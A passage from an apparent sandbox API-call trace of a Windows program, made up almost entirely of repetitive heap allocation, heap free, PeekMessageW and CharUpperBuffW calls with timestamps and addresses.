Flags=0x0, Size=0x4) returned 0x2a71cb8 [0215.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0215.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0215.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0215.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0215.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0215.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0215.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0215.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0215.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0215.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0215.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.405] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0215.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.405] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0215.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0215.405] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0215.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0215.406] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0215.406] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0215.406] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0215.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab890 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74598 [0215.406] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0215.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0215.406] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0215.407] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.407] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0215.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74598 | out: hHeap=0x2af0000) returned 1 [0215.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0215.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0215.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0215.408] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.408] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0215.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab950 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0215.408] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0215.409] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0215.409] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0215.409] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.410] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.410] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 